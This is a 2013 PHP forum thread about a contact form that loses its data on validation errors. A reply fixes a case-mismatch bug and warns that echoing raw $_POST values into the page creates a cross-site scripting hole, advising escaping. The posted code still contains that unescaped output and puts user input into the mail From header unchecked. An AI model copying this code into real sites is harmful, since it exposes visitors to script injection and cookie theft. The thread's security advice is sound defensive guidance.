homepage Welcome to WebmasterWorld Guest from 54.226.213.228
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
form data disappears
When user encounters an error, data disappears
jamescurl




msg:4536806
 11:51 am on Jan 17, 2013 (gmt 0)

Hi, I am new to webmasterworld.com.
I am stuck on trying to get my code to work.
On the contact form, if a user doesn't fill out a required field then an error appears with what they must do, but their data has disappeared. Below is the code I currently help.
Any help would be greatly appreciated.

<?php session_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="css/lightbox.css" rel="stylesheet" />
</head>

<body>
<?php

if (isset($_POST['submit'])) {
$error = "";

if (!empty($_POST['Name'])) {
$name = $_POST['Name'];
} else {
$error .= "You didn't type in your name. <br />";
}

if (!empty($_POST['Email'])) {
$email = $_POST['Email'];
if (!preg_match("/^[_a-z0-9]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/i", $email)){
$error .= "The e-mail address you entered is not valid. <br/>";
}
} else {
$error .= "You didn't type in an e-mail address. <br />";
}

if (!empty($_POST['Message'])) {
$message = $_POST['Message'];
} else {
$error .= "You didn't type in a message. <br />";
}

if (!empty($_POST['Telephone'])) {
$telephone= $_POST['Telephone'];
}

if(($_POST['code']) == $_SESSION['code']) {
$code = $_POST['code'];
} else {
$error .= "The captcha code you entered does not match. Please try again. <br />";
}

if (empty($error)) {
$from = 'From: ' . $name . ' <' . $email . '>';
$to = "email@emial.com";
$subject = "Message from website";
$content = " From: ".$name . "\n Phone number: " . $telephone . "\n Message: " . $message;
$success = "<h3>Thank you! Your message has been sent!</h3>";
mail($to,$subject,$content,$from);
}
}
?>

<p>&nbsp;</p>
<table align="center" width="1090" border="0" >
<tr>
<td valign="top">
<div class="Contactpage-BG">
<table border="0" align="left" width="100%">

<tr>
<td>
</td>

</tr>
<tr>
<td align="left">
<div class="Testimonial">
<div class="Contact-BG">

<div class="Contact-Midleft">

</div>
<div class="Contact-text">
<p class="Contact-text"><i> *Compulsory Fields</i> </p>
</div>

<form method="post" action="" >
<table width="600" height="531" border="0" cellpadding="0">
<tr>
<td width="111" height="28" class="Contact-text"><div class="Contactboxes-name-label">*Name:</div></td>
<td colspan="2">
<input name="Name" type="text" class="Contactboxes-name" id="Name" value="<?php echo $_POST['name']; ?>"/>
</td>
</tr>
<tr>
<td height="28" class="Contact-text"><div class="Contactboxes-email-label">*Email:</div></td>
<td colspan="2"><input name="Email" type="text" size="60" class="Contactboxes-email" id="Email" value="<?php echo $_POST['email']; ?>"/></td>
</tr>
<tr>
<td height="28" class="Contact-text"><div class="Contactboxes-telephone-label"> Telephone:</div></td>
<td colspan="2"><input name="Telephone" type="text" class="Contactboxes-telephone" id="Telephone" value="<?php echo $_POST['telephone']; ?>"/></td>
</tr>
<tr>
<td height="139" valign="top" class="Contact-text"><div class="Contactboxes-message-label">*Message:</div></td>
<td colspan="2"><textarea name="Message" cols="56" rows="11" class="Contacttextarea" id="Message"><?php echo $_POST['message']; ?></textarea></td>
</tr>
<tr>
<td valign="top" class="Contact-text"><div class="Contactboxes-spam-label">*Anti-SpamBot Code:</div></td>
<td colspan="2" valign="top"><div class="Contactboxes-spam">Please enter the numbers you see in this image<br />
into the box below</div></td>
</tr>
<tr>
<td height="51">&nbsp;</td>
<td width="209" valign="top"><div class="Captchaimagebox"><label><img src="captcha.php"></label></div></td>
<td width="252" rowspan="3" valign="top">
<?php
if (!empty($error)) {
echo '<p class="error"><font color="#FF0000"><strong>Your message was NOT sent</strong></font><br/>' . $error . '</p>';
} elseif (!empty($success)) {
echo $success;
}
?>
</td>
</tr>
<tr>
<td height="48">&nbsp;</td>
<td valign="top"><input name="code" type="text" class="Captchabox"></td>
</tr>
<tr>
<td height="65">&nbsp;</td>
<td><input type="submit" class="Contact-Send" name="submit" value="" /></td>
</tr>

</table>
<p>
<div class="contactfields">
<label for="Name"></label></div></p>
</form>


</div>
<div class="Contact-Midright"></div>
</div>



</td>

</tr>

</table>


</div>
</td>
</tr>
</table>
</body>
</html>

 

swa66




msg:4536809
 12:17 pm on Jan 17, 2013 (gmt 0)

hash keys for arrays are case-sensitve.


<input name="Email" type="text" size="60" class="Contactboxes-email" id="Email" value="<?php echo $_POST['email']; ?>"/>

See the "Email" used to send it to you and the "email" used to send it back ?

That said, this is a classic example of a website vulnerable to Cross Site Scripting (XSS) - well at least once you fix this.

Ref: [owasp.org...]

jamescurl




msg:4536822
 1:20 pm on Jan 17, 2013 (gmt 0)

Thanks swa66,
That works perfectly.
You're a star.

swa66




msg:4536857
 3:44 pm on Jan 17, 2013 (gmt 0)

I hope you fixed the XSS security bugs. Remember that any XSS affects your entire site - not just the vulnerable element itself.

jamescurl




msg:4537965
 2:17 pm on Jan 21, 2013 (gmt 0)

What XSS security bugs? and how do i fix them.
With the form, if the user has filled out the form successfully, a message says that it has been sent, but the data in the fields is still there. Any way to correct this?
Kind Regards
James

swa66




msg:4537981
 3:06 pm on Jan 21, 2013 (gmt 0)

Anywhere where you send back unfiltered input is a XSS vulnerability.

How to fix them see the link to oawsp above for a comprehensive answer.

In essence: make sure there is no html in the input that goes back to the user - yes that's all it takes to have a XSS vulnerability.

Simply changing < > " ' and & to their respective htmlentities is enough in the cases you've shown so far.
htmlencode() is ok too - but it's not a generic solution in all possible cases - you should escape those things that in the context of where you output them can hurt you.

jamescurl




msg:4537994
 3:44 pm on Jan 21, 2013 (gmt 0)

Will this correct the issue of data still be there once the user has clicked on "Send" and all the fields are completed correctly?

swa66




msg:4538037
 5:49 pm on Jan 21, 2013 (gmt 0)

It doesn't matter that you do not echo back upon success, any way there is a possibility for echoing back unfiltered content is more than enough for an attacker to exploit it - even an error page is plenty of an opportunity.
The attacker does not need to use your form ... they can make their own (it might even not look like a form at all just a button or link is enough for them. If you process the input and send unfiltered output back: you lose (and/or your users lose).

What attackers do with XSS is insert javascript in the input and then it runs in the context of your website - hence having access to e.g. cookies the browser has to authenticate -> it then forwards that to the attacker allowing him access.

Don't output unfiltered user input: running it through htmlencode() before you output it. will remove most of the problems. Actually: there are functional problems solved there too.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved